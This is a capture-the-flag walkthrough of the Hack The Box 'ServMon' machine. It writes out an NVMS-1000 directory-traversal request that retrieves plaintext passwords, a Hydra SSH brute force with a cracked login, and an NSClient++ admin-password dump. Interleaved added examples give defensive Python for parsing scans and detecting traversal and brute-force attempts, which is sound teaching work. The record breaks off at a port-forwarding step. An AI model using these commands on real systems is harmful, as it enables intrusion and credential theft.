Quick Summary
→ A very nice box that is a good fit for beginners: the machine is vulnerable to directory traversal, which lets an attacker enumerate several files and gain access to it. I would say the privilege escalation part is quite hard if you go through the NSClient++ web server, because it takes time to load due to high network traffic, but I could easily get root using cURL to send the requests. Using cURL I sent nc.exe and executed it, and finally got root.
Penetration Testing Methodologies
Network Scanning
→ Nmap scan
→ discover open ports and what services are running
Enumeration
→ Service enumeration
→ ftp is available, so I dig into it
→ got the Confidential.txt
Post Exploitation
→ log in to the web page with the credentials we got
→ NVMS-1000 was vulnerable to directory traversal
→ enumerate the machine with the directory-traversal vulnerability
→ found the Passwords.txt file on a desktop
Exploitation
→ collect all the passwords
→ use them to brute force the users with Hydra
→ finally I got the right password, logged in over SSH and got user.txt
Privilege Escalation
→ start enumerating directories
→ found the NSClient++ folder
→ after searching on Google: there is a vulnerability in NSClient++ where a low-privilege user has the ability to read the web administrator's password in cleartext from the configuration file
→ due to the high load of network traffic the web page is very slow to load, so I try cURL to get root
→ put nc.exe on the box using an SMB server
→ load the binary and execute it
→ finally we get root
Network Scanning
Walkthrough
→ I always begin with Nmap to look at which services are running. I always use:
- -sV ⇒ probe open ports to determine service/version info
- -sC ⇒ equivalent to --script=default
- -A ⇒ aggressive scan (enables OS detection, version detection, script scanning and traceroute)
- -oN ⇒ save our scan results to a text file (normal output)
# bash
nmap -sV -sC -A 10.10.10.184 -oN nmap-ServMon
# bash
root in htb/boxes/ServMon ❯ nmap -sV -sC -A 10.10.10.184 -oN nmap-ServMon
Starting Nmap 7.80 ( https://nmap.org )
Nmap scan report for 10.10.10.184
Host is up (0.25s latency).
Not shown: 991 closed ports
PORT     STATE SERVICE      VERSION
21/tcp   open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20  12:05PM       <DIR>          Users
| ftp-syst:
|_  SYST: Windows_NT
22/tcp   open  ssh          OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
|   2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
|   256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_  256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp   open  http
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.1 404 Not Found
|     Content-type: text/html
|     Content-Length: 0
|     Connection: close
|     AuthInfo:
|   GetRequest, HTTPOptions, RTSPRequest:
|     HTTP/1.1 200 OK
|     Content-type: text/html
|     Content-Length: 340
|     Connection: close
|     AuthInfo:
|     <!DOCTYPE html PUBLIC "-
|     <html xmlns="http://www.w3.org/1999/xhtml">
|     <head>
|     <title></title>
|     <script type="text/javascript">
|     window.location.href = "Pages/login.htm";
|     </script>
|     </head>
|     <body>
|     </body>
|_    </html>
|_http-title: Site doesn't have a title (text/html).
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
5666/tcp open  nrpe?
6699/tcp open  napster?
8443/tcp open  tcpwrapped
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.80%I=7%D=4/14%Time=5E94FF5F%P=x86_64-pc-linux-gnu%r(GetR
SF:equest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\nCon
SF:tent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n\xe
SF:f\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\.0\
SF:x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-tra
SF:nsitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/xhtm
SF:l\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x20<s
SF:cript\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\x20w
SF:indow\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\x20
SF:</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(HTTPOption
SF:s,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\nContent-
SF:Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n\xef\xbb
SF:\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\.0\x20Tr
SF:ansitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-transiti
SF:onal\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/xhtml\">\
SF:r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x20<script
SF:\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\x20window
SF:\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\x20</scr
SF:ipt>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(RTSPRequest,1B4
SF:,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\nContent-Lengt
SF:h:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n\xef\xbb\xbf<
SF:!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\.0\x20Transit
SF:ional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-transitional\
SF:.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/xhtml\">\r\n<h
SF:ead>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x20<script\x20t
SF:ype=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\x20window\.loc
SF:ation\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\x20</script>\
SF:r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(FourOhFourRequest,65
SF:,"HTTP/1\.1\x20404\x20Not\x20Found\r\nContent-type:\x20text/html\r\nCon
SF:tent-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=4/14%OT=21%CT=1%CU=44262%PV=Y%DS=2%DC=T%G=Y%TM=5E95004
OS:9%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=106%TI=I%CI=I%TS=U)SEQ(SP=F
OS:C%GCD=1%ISR=FC%TI=I%CI=I%II=I%SS=S%TS=U)OPS(O1=M54DNW8NNS%O2=M54DNW8NNS%
OS:O3=M54DNW8%O4=M54DNW8NNS%O5=M54DNW8NNS%O6=M54DNNS)WIN(W1=FFFF%W2=FFFF%W3
OS:=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M54DNW8NNS%CC=N
OS:%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%
OS:F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y
OS:%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%R
OS:D=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%
OS:S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPC
OS:K=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 2m57s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-04-14T00:16:09
|_  start_date: N/A

TRACEROUTE (using port 993/tcp)
HOP RTT       ADDRESS
1   257.80 ms 10.10.14.1
2   257.93 ms 10.10.10.184

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 317.59 seconds
root in htb/boxes/ServMon took 5m17s ❯
Nmap Results
So there are a lot of ports open, but let's check which ones are the most interesting. Checking them one by one takes a lot of time.
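The "which ports are interesting" triage can be done in code instead of by eye. The following is an added example and is not part of the original writeup: a small parser for nmap's normal (-oN) output format as shown in the scan above, which collects each open port together with the NSE script lines attached to it, and then flags the findings a defender would act on (anonymous FTP, an unidentified service, a web interface on a non-standard port, SMB signing not required). The input is a constructed excerpt modelled on the scan above; the finding labels are my own.

```python
import re
from dataclasses import dataclass, field

# Constructed excerpt in nmap -oN format, modelled on the ServMon scan above.
SAMPLE_SCAN = """\
PORT     STATE SERVICE      VERSION
21/tcp   open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20  12:05PM       <DIR>          Users
22/tcp   open  ssh          OpenSSH for_Windows_7.7 (protocol 2.0)
80/tcp   open  http
|_http-title: Site doesn't have a title (text/html).
445/tcp  open  microsoft-ds?
8443/tcp open  tcpwrapped
| http-title: NSClient++
|_Requested resource was /index.html

Host script results:
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
"""

# "21/tcp   open  ftp          Microsoft ftpd"  ->  port, proto, state, service, version
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


@dataclass
class PortEntry:
    port: int
    proto: str
    state: str
    service: str
    version: str
    scripts: list = field(default_factory=list)  # NSE output lines ("| ..." / "|_ ...")


def parse_nmap_normal(text):
    """Parse nmap -oN text into per-port entries plus the host-script lines."""
    ports, host_scripts = [], []
    current = None
    in_host_scripts = False
    for line in text.splitlines():
        if line.startswith("Host script results:"):
            in_host_scripts = True
            current = None
            continue
        m = PORT_RE.match(line)
        if m and not in_host_scripts:
            current = PortEntry(int(m.group(1)), m.group(2), m.group(3),
                                m.group(4), m.group(5).strip())
            ports.append(current)
        elif line.startswith("|"):
            body = line.lstrip("|_ ").strip()  # drop the NSE tree prefix
            if in_host_scripts:
                host_scripts.append(body)
            elif current is not None:
                current.scripts.append(body)
    return ports, host_scripts


def triage(ports, host_scripts):
    """Return (port, finding) pairs that deserve follow-up."""
    findings = []
    for p in ports:
        if p.state != "open":
            continue
        nse_text = " ".join(p.scripts)
        if "Anonymous FTP login allowed" in nse_text:
            findings.append((p.port, "anonymous FTP enabled"))
        if "http-title" in nse_text and p.port not in (80, 443):
            findings.append((p.port, "web interface on non-standard port"))
        if p.service.endswith("?") or p.service == "tcpwrapped":
            findings.append((p.port, "service unidentified, inspect manually"))
    if any("Message signing enabled but not required" in s for s in host_scripts):
        findings.append((445, "SMB signing not required"))
    return findings


if __name__ == "__main__":
    parsed_ports, parsed_host_scripts = parse_nmap_normal(SAMPLE_SCAN)
    for port, finding in triage(parsed_ports, parsed_host_scripts):
        print(f"{port}/tcp: {finding}")
```

The parser keys off the structure nmap guarantees (a `port/proto state service` line followed by `|`-prefixed script lines), so it works on a real `-oN` file as well as on the excerpt.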
Enumeration
Checking the FTP Service
Since FTP is open, let's check whether we can access it anonymously:
root in htb/boxes/ServMon ❯ ftp 10.10.10.184
Connected to 10.10.10.184.
220 Microsoft FTP Service
Name (10.10.10.184:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:05PM       <DIR>          Users
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:06PM       <DIR>          Nadine
01-18-20  12:08PM       <DIR>          Nathan
226 Transfer complete.
ftp>
Inside the FTP share we got two users, Nadine & Nathan. Let's check Nadine's directory first and transfer its file to my Kali machine.
ftp> cd Nadine
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:08PM                  174 Confidential.txt
226 Transfer complete.
ftp> get Confidential.txt
local: Confidential.txt remote: Confidential.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
174 bytes received in 6.29 secs (0.0270 kB/s)
ftp>
So inside Nadine's directory there is a Confidential.txt file. Next, check Nathan's directory:
ftp> cd ..
250 CWD command successful.
ftp> cd Nathan
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:10PM                  186 Notes to do.txt
226 Transfer complete.
ftp> get "Notes to do.txt"
local: Notes to do.txt remote: Notes to do.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
186 bytes received in 0.25 secs (0.7285 kB/s)
ftp>
There is a Notes to do.txt, so it is a task list for our user. Next, read the .txt files of the two users:
root in htb/boxes/ServMon ❯ ls
Confidential.txt  nmap-ServMon  'Notes to do.txt'
root in htb/boxes/ServMon ❯ cat Confidential.txt
Nathan,

I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine
root in htb/boxes/ServMon ❯
So I got a hint from Nadine's txt file. It seems that the admin put her password on her desktop. Next, the tasks of Nathan:
root in htb/boxes/ServMon ❯ cat 'Notes to do.txt'
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint
root in htb/boxes/ServMon ❯
So I got another hint: tasks 1 & 2 are completed but the remaining 3 are not. Let's start digging more:
Post Exploitation
Checking the Web client
I visited the web page of the box. In Nathan's notes they mentioned NVMS, and this one seems to have the version NVMS-1000.
I searched it on Google and it is vulnerable to directory traversal:
The step by step on Exploit DB:
OffSec's Exploit Database Archive
NVMS 1000 - Directory Traversal. webapps exploit for Hardware platform
The NVMS login page:
Directory Traversal
In this phase I will try the nvms-1000 exploit with Burp Suite:
Directory traversal confirmed! Now let's try to look at Nadine's desktop; it's mentioned in her note that her password is there:
GET /../../../../../../../../../../../../Users/Nadine/Desktop/Passwords.txt HTTP/1.1
Host: 10.10.10.184
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: dataPort=6063
Upgrade-Insecure-Requests: 1
But I got a 404 status:
HTTP/1.1 404 Not Found
Content-type: text/html
Content-Length: 0
Connection: close
AuthInfo:
I think Nadine's password file doesn't exist, so I tried user Nathan to see if I can get anything:
GET /../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1
Host: 10.10.10.184
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: dataPort=6063
Upgrade-Insecure-Requests: 1
After I sent that request I got a list of passwords:
HTTP/1.1 200 OK
Content-type: text/plain
Content-Length: 156
Connection: close
AuthInfo:

1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
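What made the two requests above work is that the NVMS-1000 web server mapped the request path onto the filesystem without anchoring it under its web root, so a run of `../` segments walks out to `C:\Users`. The block below is an added example, not code from the writeup or from the NVMS product: a naive resolver that reproduces the escape, a hardened resolver that decodes, normalises and refuses any path that climbs above the root (also catching percent-encoded dots, backslash separators and NUL bytes), and a small detector that runs over constructed Common Log Format access-log lines modelled on the requests above and reports traversal attempts together with the status the server returned. The web root path, the log lines and the log format are assumptions made for the example.

```python
import posixpath
import re
from urllib.parse import unquote

WEB_ROOT = "/srv/nvms/www"  # assumed web root for the example; the product's real path is not on the page


def canonical(request_path):
    """Decode twice (to defeat double-encoding), unify separators, split into segments."""
    decoded = unquote(unquote(request_path)).replace("\\", "/")
    return decoded, [seg for seg in decoded.split("/") if seg not in ("", ".")]


def naive_resolve(web_root, request_path):
    """String-concatenate and normalise: the pattern that lets '..' walk out of the root."""
    return posixpath.normpath(web_root + "/" + request_path)


def safe_resolve(web_root, request_path):
    """Map a URL path onto web_root; return None if it would escape or is malformed."""
    decoded, segments = canonical(request_path)
    if "\x00" in decoded:
        return None  # a NUL would truncate the path inside a C-based server
    parts = []
    for seg in segments:
        if seg == "..":
            if not parts:
                return None  # climbing above the root is never a legitimate request
            parts.pop()
        else:
            parts.append(seg)
    return posixpath.join(web_root, *parts)


# Constructed access-log lines (Common Log Format) modelled on the requests above.
SAMPLE_LOG = """\
10.10.14.5 - - [14/Apr/2020:00:20:01 +0000] "GET /Pages/login.htm HTTP/1.1" 200 340
10.10.14.5 - - [14/Apr/2020:00:21:10 +0000] "GET /../../../../../../Users/Nadine/Desktop/Passwords.txt HTTP/1.1" 404 0
10.10.14.5 - - [14/Apr/2020:00:21:42 +0000] "GET /../../../../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1" 200 156
10.10.14.9 - - [14/Apr/2020:00:22:05 +0000] "GET /Pages/%2e%2e/%2e%2e/windows/win.ini HTTP/1.1" 200 92
"""

# source, timestamp, method, path, status, size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+|-)')


def is_traversal(request_path):
    """Any '..' segment after decoding is suspicious: browsers normalise paths before sending."""
    return ".." in canonical(request_path)[1]


def flag_traversal(log_text):
    """Return (source, path, status) for each request carrying a traversal sequence.
    A 200 on such a request means the server actually served the file."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        src, _ts, _method, path, status, _size = m.groups()
        if is_traversal(path):
            hits.append((src, path, int(status)))
    return hits


if __name__ == "__main__":
    for src, path, status in flag_traversal(SAMPLE_LOG):
        print(f"{src} {status} {path} -> hardened resolver gives {safe_resolve(WEB_ROOT, path)}")
```

The important detail is that the hardened resolver walks the segments itself rather than calling `normpath` on the concatenated string: `normpath` silently discards `..` segments that reach the root, which hides exactly the request a server should be rejecting.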
Exploitation
Brute forcing the SSH
I saved all the passwords in a txt file, then I created another txt file which contains the 2 users, nadine & nathan. I used hydra to brute force the SSH service and finally got the right credentials.
root in htb/boxes/ServMon took 1m15s ❯ hydra -L users -P passwords 10.10.10.184 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-04-14 08:45:38
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 14 tasks per 1 server, overall 14 tasks, 14 login tries (l:2/p:7), ~1 try per task
[DATA] attacking ssh://10.10.10.184:22/
[22][ssh] host: 10.10.10.184   login: Nadine   password: L1k3B1gBut7s@W0rk
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-04-14 08:45:58
root in htb/boxes/ServMon took 24s ❯
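The hydra run above is 14 login attempts against two accounts from one source in about 20 seconds, ending in a successful login: that shape is what a defender wants an alert on. Below is an added example, not part of the writeup: a detector that parses sshd-style "Failed/Accepted password" lines (constructed here, in OpenSSH's wording, since the box's own SSH logs are not on the page), keeps a per-source sliding window, and raises an alert when one source accumulates failures across more than one account, escalating to high severity when an accepted login from the same source lands inside the window. The source addresses, ports, thresholds and timestamps are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sshd-style authentication lines modelled on the hydra run above
# (2 accounts x 7 passwords in about 20 seconds, ending in a valid login), plus an
# ordinary user from another address who mistypes once.  Addresses/ports are made up.
SAMPLE_AUTH_LOG = """\
2020-04-14T08:45:38 sshd[2696]: Failed password for Nadine from 10.10.14.5 port 51001 ssh2
2020-04-14T08:45:39 sshd[2696]: Failed password for Nathan from 10.10.14.5 port 51002 ssh2
2020-04-14T08:45:41 sshd[2696]: Failed password for Nadine from 10.10.14.5 port 51003 ssh2
2020-04-14T08:45:42 sshd[2696]: Failed password for Nathan from 10.10.14.5 port 51004 ssh2
2020-04-14T08:45:44 sshd[2696]: Failed password for Nadine from 10.10.14.5 port 51005 ssh2
2020-04-14T08:45:45 sshd[2696]: Failed password for Nathan from 10.10.14.5 port 51006 ssh2
2020-04-14T08:45:47 sshd[2696]: Failed password for Nadine from 10.10.14.5 port 51007 ssh2
2020-04-14T08:45:48 sshd[2696]: Failed password for Nathan from 10.10.14.5 port 51008 ssh2
2020-04-14T08:45:50 sshd[2696]: Failed password for Nadine from 10.10.14.5 port 51009 ssh2
2020-04-14T08:45:51 sshd[2696]: Failed password for Nathan from 10.10.14.5 port 51010 ssh2
2020-04-14T08:45:53 sshd[2696]: Failed password for Nadine from 10.10.14.5 port 51011 ssh2
2020-04-14T08:45:54 sshd[2696]: Failed password for Nathan from 10.10.14.5 port 51012 ssh2
2020-04-14T08:45:56 sshd[2696]: Failed password for Nathan from 10.10.14.5 port 51013 ssh2
2020-04-14T08:45:58 sshd[2696]: Accepted password for Nadine from 10.10.14.5 port 51014 ssh2
2020-04-14T09:12:03 sshd[2696]: Failed password for Nathan from 10.10.14.22 port 40211 ssh2
2020-04-14T09:12:20 sshd[2696]: Accepted password for Nathan from 10.10.14.22 port 40218 ssh2
"""

LINE_RE = re.compile(
    r"^(\S+) sshd\[\d+\]: (Failed|Accepted) password for (?:invalid user )?(\S+) from (\S+) port \d+"
)


def parse_auth_log(text):
    """Return (timestamp, outcome, user, source) tuples for password-auth lines."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts, outcome, user, src = m.groups()
            events.append((datetime.fromisoformat(ts), outcome, user, src))
    return events


def detect_bruteforce(events, window_s=60, min_failures=5, min_users=2):
    """Per-source sliding window.  Alert when one source accumulates at least
    min_failures failed logins spread over at least min_users accounts within
    window_s seconds (the spray-across-users shape that -L/-P wordlists produce).
    Severity becomes 'high' when an Accepted login from that source lands inside
    the same window, because one of the guesses most likely succeeded."""
    recent = defaultdict(deque)  # source -> deque of (ts, outcome, user)
    alerts = {}
    for ts, outcome, user, src in sorted(events, key=lambda e: e[0]):
        q = recent[src]
        q.append((ts, outcome, user))
        while q and (ts - q[0][0]).total_seconds() > window_s:
            q.popleft()  # drop events that fell out of the window
        failures = [e for e in q if e[1] == "Failed"]
        users = {e[2] for e in failures}
        if len(failures) < min_failures or len(users) < min_users:
            continue
        severity = "high" if outcome == "Accepted" else "medium"
        prev = alerts.get(src)
        if prev is None or prev["severity"] != "high" or severity == "high":
            alerts[src] = {
                "source": src,
                "severity": severity,
                "failures": len(failures),
                "accounts": sorted(users),
                "compromised": user if outcome == "Accepted" else None,
                "last_seen": ts.isoformat(),
            }
    return list(alerts.values())


if __name__ == "__main__":
    for alert in detect_bruteforce(parse_auth_log(SAMPLE_AUTH_LOG)):
        print(alert)
```

The second source in the sample (one failure, then success) stays below the threshold, which is the point of requiring both a failure count and a spread across accounts: a single user fat-fingering a password should not page anyone.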
Get user.txt
After I found the right creds, I finally got into the machine and grabbed the user.txt:
# bash
root in htb/boxes/ServMon ❯ ssh nadine@10.10.10.184
nadine@10.10.10.184's password:

Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

nadine@SERVMON C:\Users\Nadine>dir
 Volume in drive C has no label.
 Volume Serial Number is 728C-D22C

 Directory of C:\Users\Nadine

08/04/2020  23:16    <DIR>          .
08/04/2020  23:16    <DIR>          ..
18/01/2020  11:23    <DIR>          3D Objects
18/01/2020  11:23    <DIR>          Contacts
08/04/2020  22:28    <DIR>          Desktop
08/04/2020  22:28    <DIR>          Documents
18/01/2020  11:23    <DIR>          Downloads
08/04/2020  22:27    <DIR>          Favorites
08/04/2020  22:27    <DIR>          Links
18/01/2020  11:23    <DIR>          Music
18/01/2020  11:31    <DIR>          OneDrive
18/01/2020  11:23    <DIR>          Pictures
18/01/2020  11:23    <DIR>          Saved Games
18/01/2020  11:23    <DIR>          Searches
18/01/2020  11:23    <DIR>          Videos
               0 File(s)              0 bytes
              15 Dir(s)  27,382,452,224 bytes free

nadine@SERVMON C:\Users\Nadine>cd Desktop

nadine@SERVMON C:\Users\Nadine\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 728C-D22C

 Directory of C:\Users\Nadine\Desktop

08/04/2020  22:28    <DIR>          .
08/04/2020  22:28    <DIR>          ..
14/04/2020  01:20                34 user.txt
               1 File(s)             34 bytes
               2 Dir(s)  27,382,452,224 bytes free

nadine@SERVMON C:\Users\Nadine\Desktop>more user.txt
[-----]bb8f5da6[-------------------]

nadine@SERVMON C:\Users\Nadine\Desktop>
Privilege Escalation
Enumerating directories
At first I started to enumerate the machine's directories, and inside 'Program Files' I found what was mentioned in Nathan's note, the NSClient++ directory:
# bash
nadine@SERVMON C:\Users\Nadine\Desktop>cd /

nadine@SERVMON C:\>dir
 Volume in drive C has no label.
 Volume Serial Number is 728C-D22C

 Directory of C:\

08/04/2020  23:21    <DIR>          inetpub
19/03/2019  05:52    <DIR>          PerfLogs
08/04/2020  23:21    <DIR>          Program Files
08/04/2020  23:21    <DIR>          Program Files (x86)
18/01/2020  11:00    <DIR>          RecData
18/01/2020  12:31    <DIR>          Shared
14/04/2020  01:38    <DIR>          Temp
08/04/2020  22:26    <DIR>          Users
09/04/2020  09:38    <DIR>          Windows
               0 File(s)              0 bytes
               9 Dir(s)  27,379,249,152 bytes free

nadine@SERVMON C:\>cd 'Program Files'
The system cannot find the path specified.

nadine@SERVMON C:\>cd "Program Files"

nadine@SERVMON C:\Program Files>dir
 Volume in drive C has no label.
 Volume Serial Number is 728C-D22C

 Directory of C:\Program Files

08/04/2020  23:21    <DIR>          .
08/04/2020  23:21    <DIR>          ..
08/04/2020  23:21    <DIR>          Common Files
08/04/2020  23:18    <DIR>          Internet Explorer
19/03/2019  05:52    <DIR>          ModifiableWindowsApps
16/01/2020  19:11    <DIR>          NSClient++
08/04/2020  23:09    <DIR>          Reference Assemblies
08/04/2020  23:21    <DIR>          UNP
14/01/2020  09:14    <DIR>          VMware
08/04/2020  22:31    <DIR>          Windows Defender
08/04/2020  22:45    <DIR>          Windows Defender Advanced Threat Protection
19/03/2019  05:52    <DIR>          Windows Mail
19/03/2019  12:43    <DIR>          Windows Multimedia Platform
19/03/2019  06:02    <DIR>          Windows NT
19/03/2019  12:43    <DIR>          Windows Photo Viewer
19/03/2019  12:43    <DIR>          Windows Portable Devices
19/03/2019  05:52    <DIR>          Windows Security
19/03/2019  05:52    <DIR>          WindowsPowerShell
               0 File(s)              0 bytes
              18 Dir(s)  27,379,228,672 bytes free

nadine@SERVMON C:\Program Files>
I searched this on Google and found this step-by-step privilege escalation.
Based on the exploit: when NSClient++ is installed with the Web Server enabled, local low-privilege users have the ability to read the web administrator's password in cleartext from the configuration file. From there a user is able to log in to the web server and make changes to the configuration that are normally restricted.
Grab administrator password
I opened the NSClient++ directory and tried to display the admin password:
# bash
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

nadine@SERVMON C:\Users\Nadine>cd \"Program Files"

nadine@SERVMON C:\Program Files>cd NSClient++

nadine@SERVMON C:\Program Files\NSClient++>nscp web -- password --display
Current password: ew2x6SsGTxjRwXOT

nadine@SERVMON C:\Program Files\NSClient++>
Got it! Now let's check on which port the NSClient++ Web Server is running:
# bash
nadine@SERVMON C:\Program Files>netstat -ano

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:21             0.0.0.0:0              LISTENING       2472
  TCP    0.0.0.0:22             0.0.0.0:0              LISTENING       2696
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       8064
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       884
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5040           0.0.0.0:0              LISTENING       3924
  TCP    0.0.0.0:5666           0.0.0.0:0              LISTENING       1832
  TCP    0.0.0.0:5666           0.0.0.0:0              LISTENING       1832
  TCP    0.0.0.0:6063           0.0.0.0:0              LISTENING       8064
  TCP    0.0.0.0:6699           0.0.0.0:0              LISTENING       8064
  TCP    0.0.0.0:7680           0.0.0.0:0              LISTENING       7344
  TCP    0.0.0.0:8443           0.0.0.0:0              LISTENING       1832
NSClient++ is running on port 8443; it also appeared in my nmap scan during the recon phase:
8443/tcp open  tcpwrapped
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
To work on this I need to use port forwarding and then visit the NSClient web page:
root in htb/boxes/ServMon ❯ ssh -L 8443:127.0.0.1:8443 nadine@10.10.10.184

Microsoft Windows [Version 10.0.18363.752]
